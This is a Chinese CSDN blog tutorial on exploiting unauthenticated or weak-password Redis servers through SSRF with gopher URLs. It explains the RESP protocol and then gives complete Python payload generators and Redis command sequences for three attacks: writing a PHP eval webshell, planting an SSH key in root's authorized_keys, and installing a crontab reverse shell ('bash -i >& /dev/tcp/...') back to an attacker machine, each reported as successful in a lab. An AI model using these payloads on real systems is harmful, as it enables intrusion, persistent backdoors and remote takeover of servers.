浅析Redis中SSRF的利用

最新推荐文章于 2024-04-25 09:58:49 发布
最新推荐文章于 2024-04-25 09:58:49 发布
阅读量716 收藏 5
点赞数
文章标签: centos redis 安全 ssrf 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45521281/article/details/106530836
版权

文章目录

SSRF介绍

SSRF,服务器端请求伪造,服务器请求伪造,是由攻击者构造的漏洞,用于形成服务器发起的请求。通常,SSRF攻击的目标是外部网络无法访问的内部系统。这里我们要介绍的是关于redis中SSRF的利用,如果有什么错误的地方还请师傅们不吝赐教/握拳。

文章中的数据包构造会涉及到redis的RESP协议,所以我们这里先科普一下

RESP协议

Redis服务器与客户端通过RESP(REdis Serialization Protocol)协议通信。
RESP协议是在Redis 1.2中引入的,但它成为了与Redis 2.0中的Redis服务器通信的标准方式。这是您应该在Redis客户端中实现的协议。
RESP实际上是一个支持以下数据类型的 序列化 协议:简单字符串,错误,整数,批量字符串和数组。

RESP在Redis中用作请求 - 响应协议的方式如下:

  • 客户端将命令作为Bulk Strings的RESP数组发送到Redis服务器。
  • 服务器根据命令实现回复一种RESP类型。

在RESP中,某些数据的类型取决于第一个字节:
对于Simple Strings,回复的第一个字节是+
对于error,回复的第一个字节是-
对于Integer,回复的第一个字节是:-
对于Bulk Strings,回复的第一个字节是$
对于array,回复的第一个字节是*
此外,RESP能够使用稍后指定的Bulk StringsArray的特殊变体来表示Null值。
在RESP中,协议的不同部分始终以"\r\n"(CRLF)结束。

我们用tcpdump来抓个包来测试一下

tcpdump port 6379 -w ./Desktop/1.pcap

redis客户端中执行如下命令

192.168.163.128:6379> set name test
OK
192.168.163.128:6379> get name
"test"
192.168.163.128:6379>

抓到的数据包如下
在这里插入图片描述
hex转储看一下
在这里插入图片描述
正如我们前面所说的,客户端向将 命令作为Bulk Strings的RESP数组 发送到Redis服务器,然后服务器根据命令实现回复给客户端一种RESP类型。
我们就拿上面的数据包分析,首先是*3,代表数组的长度为3(可以简单理解为用空格为分隔符将命令分割为[“set”,”name”,”test”]);$4代表字符串的长度,0d0a即\r\n表示结束符;+OK表示服务端执行成功后返回的字符串

Redis配合gopher协议进行SSRF

概述

Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议,不过现在gopher协议用得已经越来越少了
Gopher 协议可以说是SSRF中的万金油。利用此协议可以攻击内网的 redis、ftp等等,也可以发送 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。

利用条件

能 未授权 或者能通过 弱口令 认证访问到Redis服务器

利用

redis常见的SSRF攻击方式大概有这几种:

  1. 绝对路径写webshell
  2. 写ssh公钥
  3. 写contrab计划任务反弹shell

下面我们逐个实现

绝对路径写webshell

这个方法比较常用,也是用得最多的=。=

构造payload

构造redis命令

flushall
set 1 '<?php eval($_GET["cmd"]);?>'
config set dir /var/www/html
config set dbfilename shell.php
save

写了一个简单的脚本,转化为redis RESP协议的格式

import urllib
protocol="gopher://"
ip="192.168.163.128"
port="6379"
shell="\n\n<?php eval($_GET[\"cmd\"]);?>\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(shell.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload

192.168.163.128是redis应用所在的内网ip
在这里插入图片描述
生成payload后,用curl打一波
在这里插入图片描述
执行成功,我们看一波shell是否写入成功
在这里插入图片描述
成功写入

写ssh公钥

如果/root/.ssh目录存在,则直接写入~/.ssh/authorized_keys
如果不存在,则可以利用crontab创建该目录

构造payload

构造redis命令

flushall
set 1 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali
'
config set dir /root/.ssh/
config set dbfilename authorized_keys
save

转化为redis RESP协议的格式
PS:将第一个脚本改一下即可

filename="authorized_keys"
ssh_pub="\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali\n\n"
path="/root/.ssh/"

即:

import urllib
protocol="gopher://"
ip="192.168.163.128"
port="6379"
ssh_pub="\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGd9qrfBQqsml+aGC/PoXsKGFhW3sucZ81fiESpJ+HSk1ILv+mhmU2QNcopiPiTu+kGqJYjIanrQEFbtL+NiWaAHahSO3cgPYXpQ+lW0FQwStEHyDzYOM3Jq6VMy8PSPqkoIBWc7Gsu6541NhdltPGH202M7PfA6fXyPR/BSq30ixoAT1vKKYMp8+8/eyeJzDSr0iSplzhKPkQBYquoiyIs70CTp7HjNwsE2lKf4WV8XpJm7DHSnnnu+1kqJMw0F/3NqhrxYK8KpPzpfQNpkAhKCozhOwH2OdNuypyrXPf3px06utkTp6jvx3ESRfJ89jmuM9y4WozM3dylOwMWjal root@kali\n\n"
filename="authorized_keys"
path="/root/.ssh/"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(ssh_pub.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload

生成payload
在这里插入图片描述
curl打一波
在这里插入图片描述
我们来查看一波是否成功写入
在这里插入图片描述
成功写入。尝试连接
在这里插入图片描述
成功连接
详情:使用ssh公钥实现免密码登录

利用contrab计划任务反弹shell

这个方法只能Centos上使用,Ubuntu上行不通,原因如下:

  1. 因为默认redis写文件后是644的权限,但ubuntu要求执行定时任务文件/var/spool/cron/crontabs/<username>权限必须是600也就是-rw-------才会执行,否则会报错(root) INSECURE MODE (mode 0600 expected),而Centos的定时任务文件/var/spool/cron/<username>权限644也能执行

  2. 因为redis保存RDB会存在乱码,在Ubuntu上会报错,而在Centos上不会报错

由于系统的不同,crontrab定时文件位置也会不同:
Centos的定时任务文件在/var/spool/cron/<username>
Ubuntu定时任务文件在/var/spool/cron/crontabs/<username>
Centos和Ubuntu均存在的(需要root权限)/etc/crontab PS:高版本的redis默认启动是redis权限,故写这个文件是行不通的

构造payload

构造redis的命令如下:

flushall
set 1 '\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.163.132/2333 0>&1\n\n'
config set dir /var/spool/cron/
config set dbfilename root
save

// 192.168.163.132为攻击机ip

PS:将第一个脚本改一下

reverse_ip="192.168.163.132"
reverse_port="2333"
cron="\n\n\n\n*/1 * * * * bash -i >& /dev/tcp/%s/%s 0>&1\n\n\n\n"%(reverse_ip,reverse_port)
filename="root"
path="/var/spool/cron"

即:

import urllib
protocol="gopher://"
ip="192.168.163.128"
port="6379"
reverse_ip="192.168.163.132"
reverse_port="2333"
cron="\n\n\n\n*/1 * * * * bash -i >& /dev/tcp/%s/%s 0>&1\n\n\n\n"%(reverse_ip,reverse_port)
filename="root"
path="/var/spool/cron"
passwd=""
cmd=["flushall",
	 "set 1 {}".format(cron.replace(" ","${IFS}")),
	 "config set dir {}".format(path),
	 "config set dbfilename {}".format(filename),
	 "save"
	 ]
if passwd:
	cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
	CRLF="\r\n"
	redis_arr = arr.split(" ")
	cmd=""
	cmd+="*"+str(len(redis_arr))
	for x in redis_arr:
		cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
	cmd+=CRLF
	return cmd

if __name__=="__main__":
	for x in cmd:
		payload += urllib.quote(redis_format(x))
	print payload

生成一波,尝试反弹shell
在这里插入图片描述
在这里插入图片描述
成功反弹shell

参考原文

zhang三
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
浅析Redis分布式锁
12-16
前期考虑的方案有采用ZooKeeper分布式任务,Quartz分布式任务调度,但是由于Zookeeper需要增加额外组件,Quartz需要增加表,并且项目现在已经有Redis这一组件存在,所以考虑采用Redis分布式锁的情况来完成分布式任务...
浅析redis cluster介绍与gossip协议
09-08
Redis Cluster架构,每个节点都需要开启两个端口。例如,6379是标准的Redis服务端口,而16379则是Cluster Bus的端口,用于节点之间的通信。Cluster Bus利用一种称为Gossip协议的二进制协议来高效地交换节点状态...
Redis漏洞及搭配ssrf利用的姿势
qq_71467825的博客
06-24 2302
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!!!
网络安全——利用ssrf操作内网redis写入计划任务反弹shell
Demo不是emo的博客
09-17 3343
今天的内容是ssrf漏洞的利用,环境选择的是discuz含有ssrf漏洞的版本,通过该漏洞来写入redis计划任务反弹shell(附带环境安装包)
Redis漏洞及搭配ssrf利用姿势
最新发布
zkaqlaoniao的博客
04-25 731
这篇博客就总结到这里,下次把经典一点的SSRF题目都总结到一起再学习一波,冲冲冲!
ssrf+redis
qq_45213259的博客
11-30 3818
ssrf+redis 实验环境 靶机:ubuntu16.04 ip:192.168.211.130 在靶机搭建lamp环境、安装redis、安装ssh 攻击机:kali2020 ip:192.168.211.134 在攻击机安装redis vps:windows10(本机) ip:10.133.164.81 在windows安装cn.exe 实验步骤 1.将ssrf.php文件放在web根目录下 ssrf.php: <?php $ch = curl_init(); curl_set
你真的会利用SSRF漏洞?一文教你如何利用SSRF配合gopher协议拿下服务器
weixin_61951055的博客
04-23 720
通过服务器的SSRF漏洞利用gopher协议攻击redis数据库直接拿下数据库
通过SSRF操作Redis主从复制写Webshell_R3start1
08-03
1.使用 DICT 协议添加一条测试记录 2.设置保存路径 3.设置保存文件名 4.保存 1.连接远程主服务器 2.设置保存路径 3.设置保存文件名 4.保存
LaravelRedis的配置和使用
08-22
LaravelRedis的配置和使用 Laravel框架Redis是一个非常重要的组件,它可以用来做缓存、 Session、消息队列等多种用途。下面我们将详细介绍LaravelRedis的配置和使用。 首先,需要在composer.json文件...
redis文使用手册
08-17
3. 分布式锁:利用`SETNX`和`EXPIRE`实现基于Redis的分布式锁,解决多线程或分布式环境下的并发问题。 4. 计数器:通过`INCR`和`DECR`操作,轻松实现点击计数、访问统计等功能。 5. 排行榜:利用有序集合,可以...
SSRFRedis利用
2301_80127209的博客
01-23 1256
SSRF(Server-Side Request Forgery,服务器请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统(因为请求是由服务端帮我们发起的,所以我们可以通过它来向其所在的内网机器发起请求)。Gopherus下载地址自己手动把攻击语句转换成Gopher协议的格式会很麻烦,这款工具里面内置了一些早就写好的利用语句,我们只需要学会如何使用它就可以很方便的写出一些我们需要的利用语句。
基于SSRF+Redis的内网渗透
weixin_46686336的博客
11-07 646
基于SSRF+Redis的内网渗透
SSRF+Redis组合拳啊哒~
qq_43665434的博客
04-02 1506
SSRF+Redis组合拳 好雨知时节,当春乃发生。(就是有点冷) 实验环境 主机 角色 描述 centos8 受害服务器 运行redis数据库,且含有redis未授权访问漏洞 window10 跳板服务器 含有ssrf漏洞 kali 攻击者 利用ssrf+redis未授权访问获取centos8的shell 工具: Redis nc wireshark tcpdump Redis基础 1、序列化协议 客户端-服务端之间交互的是序列化后的协议数据。在Redis,协议数据分为
SSRF攻击Redis
cosmoslin的博客
10-27 1369
Redis简介 Redis是数据库的意思。Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 Redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set –有序集合)和hash(哈希类型)。这些数据类型都支持p
浅析SSRF的各种利用方式
m0_64583632的博客
11-10 720
浅析SSRF的各种利用方式和绕过
SSRF漏洞验证及利用方法
W_seventeen的博客
02-29 9322
基础知识 SSRF简介 SSRF(Server-Side Request Forgery,服务端请求伪造),是攻击者让服务端发起构造的指定请求链接造成的漏洞。 由于存在防火墙的防护,导致攻击者无法直接入侵内网;这时攻击者可以以服务器为跳板发起一些网络请求,从而攻击内网的应用及获取内网数据。 最常见的例子:攻击者传入一个未经验证的URL,后端代码直接请求这个URL,就会造成SSRF漏洞。 其...
Redis系列漏洞总结
NLost
10-21 6305
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
ssrf redis
08-29
1. 访问 Redis 未授权的端口:Redis 默认监听在 6379 端口,如果你能够通过 SSRF 访问到该端口,并且 Redis 没有进行适当的身份验证和授权配置,那么你可能能够执行一些恶意操作,如读取或修改 Redis 的数据。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值